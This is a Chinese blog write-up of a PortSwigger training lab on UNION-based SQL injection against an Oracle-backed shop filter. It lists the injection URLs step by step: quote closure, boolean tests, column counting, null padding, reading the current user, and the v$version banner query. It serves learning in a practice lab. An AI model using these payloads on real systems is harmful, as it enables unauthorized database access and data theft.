Lab3_ SQL injection attack, querying the database type and version on Oracle

已于 2025-02-07 15:37:18 修改
阅读量456 收藏 11
点赞数 9
分类专栏: [BurpSuit官方实验室]SQL注入 文章标签: web安全 sql
于 2025-02-06 16:02:02 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_53797419/article/details/145475772
版权

文章目录

前言

实验室标题为:

SQL 注入攻击,查询 Oracle 数据库类型和版本

等级:执业者

本实验室的产品类别过滤器中存在 SQL 注入漏洞。您可以使用 UNION 攻击从注入的查询中获取结果。

要解决该实验室问题,请显示数据库版本字符串。

进入实验室

可以看到是一个商店页面

点击 Gifts

可以看到在页面中显示有 Gifts

https://xxxxxxxxx/filter?category=Gifts

可以看到链接中的传参值为Gifts

这里借助谷歌插件 hackbar 来查询

首先尝试闭合

https://xxxxxxxxx/filter?category=Gifts' --

页面返回正常

接着用 and 1=1 判断是否存在 sql 注入

https://xxxxxxxxx/filter?category=Gifts' and 1=1 --

页面返回正常

and 1=2 页面返回空白,说明存在 sql 注入

https://xxxxxxxxx/filter?category=Gifts' and 1=2 --

order by 排序

https://xxxxxxxxx/filter?category=Gifts' order by 2 --

order by 2 页面返回正常,说明有两列数据

继续联合查询,union all

这里用 null 进行填充

https://xxxxxxxxx/filter?category=Gifts' union all select null,null from dual --

将第一个位置改为’aaaa’,页面返回正常,说明第一个位置是字符串类型

https://xxxxxxxxx/filter?category=Gifts' union all select 'aaaa',null from dual --

将第一个位置改为 user

https://xxxxxxxxx/filter?category=Gifts' union all select user,null from dual --

成功输出用户名 PETER

继续尝试输出当前用户的表名

https://xxxxxxxxx/filter?category=Gifts' union select user,user_tables from dual --

页面显示服务器内部错误

构造 payload

输出 oracle 数据库的版本

https://xxxxxxxxx/filter?category=Gifts' union all select banner,null from v$version --

成功通关

【BurpSuite官方实验室】SQL联合注入
weixin_52137383的博客
03-23 4968
1.Determining the number of columns required in an SQL injection UNION attack To carry out an SQL injection UNION attack, you need to ensure that your attack meets these two requirements. This generally involves figuring out: How many columns are being r
BurpSuit官方实验室之SQL注入
tpaer的博客
11-13 6145
BurpSuit官方实验室靶场-SQL注入通关记录。
(一)SQL注入实例
weixin_43047908的博客
04-09 2287
SQL injection UNION attack, determining the number of columns returned by the query GET /filter?category=Gifts HTTP/1.1 Host: ac691f351f548a1780ec009d00da0072.web-security-academy.net Connection: close Cache-Control: max-age=0 sec-ch-ua: "Google Chrome";v=
Burp靶场sql注入学习笔记1
Tonight_Fantasy的博客
04-03 856
网页提示网站的sql语句是这样找到注入点为url根据给的查询语句构造payload完成题目需要找到未上架商品或者使用payload也可以找到所有商品包括未上架的。
Portswigger sql注入
arcuied
12-22 1183
这里靶场指出 不要随意的测试 or 1=1 在update 和 delete下可能会增删数据。在union的第二个参数可以注出来 可以分两次读username 和 password。不知道是oracle还是SqlServer还是postgresql的语法。administrator登录 使用的Oracle数据库。需求: administrator登录。需求:获取Oracle数据的数据库版本。还要注意的是Oracle数据库的特性。需求:administrator登录。需求:返回包含null的值。
portswigger靶场之sql注入(一)
wzhwzh123321的博客
01-26 561
portswigger靶场之sql注入
PortSwigger web实验室(BurpSuit官方靶场)之SQL注入
m0_74824002的博客
12-13 1157
Hi~ o( ̄▽ ̄)ブ,我是一名刚刚开始学习网安的新手。在做PortSwigger实验室(也就是BurpSuit官方做的靶场和学习中心)题目的时候发现对于新手来说还是有很多问题的。上网搜索相关文章发现可能是官方跟新了靶场的题目,导致很多文章已经“货不对板”了。思来想去最后决定自己来写一篇通关文章!如果有什么地方写的不好或者有什么错误欢迎大伙指出批评~~ps:该文章包含大量我作为初学者在解题过程中的学习过程和内容,可能会显得很臃肿。
Lab4_ SQL injection attack, querying the database type and version on MySQL and Microsoft
weixin_53797419的博客
02-06 332
本文为burpsuit官方实验室SQL注入系例第四关,查询 MySQL 和 Microsoft 的数据库类型和版本
mysql in sql注入_在 SQL 注入攻击中检查数据库
weixin_36431489的博客
01-27 446
原文来自:PORTSWIGGER WEB SECURITY >> Web Security Academy >>Examining the database >>Examining the database in SQL injection attacks...当利用 SQL 注入利用时,收集数据库本身的信息通常是必要的。这包括数据库软件的类型和版本,还包括数据...
portswigger网站sqli lab答案
12-03 696
burp网站sqli lab答案
bp靶场---SQL注入第五关
m0_72471814的博客
01-09 1050
打靶时的思考:1.sql注入的时候怎么判断是什么数据库?答:在 SQL 注入中判断数据库类型的方法如下:- **MySQL 数据库**:- 通过报错信息:you have an error in your SQL syntax, check the manual that corrsponds to your mysql server version for the tifht syntax to use near ” at line x。
1 SQL injection
(∪.∪ )...zzz的博客
04-18 1081
SQL injection 目录SQL injection一、What二、Influence三、SQL injection examples1.retrieving hidden data检索隐藏数据lab 12.subverting application logic颠覆应用程序逻辑lab2 SQL injection vulnerability allowing login bypass3.UNION attacks4. Examining the database检查数据库5.Blind SQL
漏洞分析SQL Injection Attack Lab(自用,记录)
weixin_48392428的博客
07-05 2277
SQL Injection Attack Lab1 Overview2 Lab Environment2.1 Environment Configuration2.2 Turn Off the Countermeasure2.3 Patch the Existing VM to Add the Web Application3 Lab Tasks3.1 Task 1: MySQL Console3.2 Task 2: SQL Injection Attack on SELECT Statement3.3 T
SQL injection
weixin_33921089的博客
04-05 282
SQL injection is a code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database conten...
【网络安全】——Modbus协议详解:工业通信的“通用语言”
最新发布
lingxw的博客
05-28 1240
本文系统介绍了Modbus工业通信协议的技术要点。从发展历史(1979年由Modicon公司推出)到核心特性(主从模式、四类存储区),详细解析了协议族分类(RTU/ASCII/TCP/Secure)及版本演进。重点剖析了RTU/TCP报文结构,并通过典型示例说明通信机制(功能码、时序流程)。文章还提供了开发工具推荐(ModbusPoll、libmodbus等)和学习路径。作为工业通信领域的事实标准,Modbus凭借其简单可靠的特性在工业4.0时代仍保持活力,并持续演进新形态(如Modbus over TSN
网络安全之XSS漏洞
anquan2233的博客
05-28 1082
然而,XSS 漏洞可以突破这一保护,攻击者可以通过注入恶意脚本来窃取用户的 Cookie,劫持用户的 Web 行为,甚至结合 CSRF(跨站请求伪造)进行针对性的攻击,进一步导致用户信息泄露或账户劫持等严重安全问题。与反射型和存储型 XSS 漏洞不同,基于 DOM 的 XSS 漏洞不需要用户数据出现在服务器的响应中,而是发生在客户端的 JavaScript 代码中。,简称 XSS),当应用程序将用户提交的数据发送到浏览器的页面中,但未经过适当的验证或转义时,就会引发跨站脚本(XSS)漏洞。
error querying database sql injection violation
09-14
对不起,我无法提供关于 SQL 注入违规查询数据库的具体信息。然而,我可以为您提供一些有关 SQL 注入的基本知识以及如何防止此类违规的建议。 SQL 注入是一种攻击技术,黑客利用它来在应用程序的数据库查询中插入...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值